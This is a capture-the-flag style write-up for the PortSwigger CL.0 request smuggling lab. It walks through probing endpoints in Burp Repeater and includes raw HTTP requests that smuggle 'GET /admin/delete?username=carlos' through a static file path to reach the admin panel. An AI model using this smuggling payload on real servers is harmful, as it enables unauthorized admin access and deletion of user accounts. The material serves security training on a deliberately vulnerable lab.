# CL.0 request smuggling

## Description

[This lab](https://portswigger.net/web-security/request-smuggling/browser/cl-0/lab-cl-0-request-smuggling) is vulnerable to CL.0 request smuggling attacks. The back-end server ignores the Content-Length header on requests to some endpoints. 

## Reproduction and proof of concept

### Probe for vulnerable endpoints

1. From the Proxy > HTTP history, send the `GET / request` to Burp Repeater twice.
2. In Burp Repeater, add both of these tabs to a new group.
3. Go to the first request and convert it to a `POST` request (right-click and select Change request method).
4. In the body, add an arbitrary request smuggling prefix. The result should look something like this:

```text
POST / HTTP/1.1
Host: lab-id.web-security-academy.net
Cookie: session=YOUR-SESSION-COOKIE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: CORRECT

GET /hopefully404 HTTP/1.1
Foo: x
```

5. Change the path of the main POST request to point to an arbitrary endpoint that you want to test.
6. Using the drop-down menu next to the Send button, change the send mode to Send group in sequence (single connection).
7. Change the Connection header of the first request to keep-alive.
8. Send the sequence and check the responses.
* If the server responds to the second request as normal, this endpoint is not vulnerable.
* If the response to the second request matches what you expected from the smuggled prefix (in this case, a 404 response), this indicates that the back-end server is ignoring the Content-Length of requests.
9. Deduce that you can use requests for static files under `/resources`, such as `/resources/images/blog.svg`, to cause a CL.0 desync.

### Exploit

1. In Burp Repeater, change the path of your smuggled prefix to point to /admin.
2. Send the requests in sequence again and observe that the second request has successfully accessed the admin panel.
3. Smuggle a request to `GET /admin/delete?username=carlos` request to solve the lab.

```text
POST /resources/images/blog.svg HTTP/1.1
Host: lab-id.web-security-academy.net
Cookie: session=YOUR-SESSION-COOKIE
Connection: keep-alive
Content-Length: CORRECT

GET /admin/delete?username=carlos HTTP/1.1
Foo: x
```

## Exploitability

An attacker will need to identify a vulnerable endpoint, smuggle a request to the back-end to access to the admin panel at `/admin`, then delete the user carlos. 
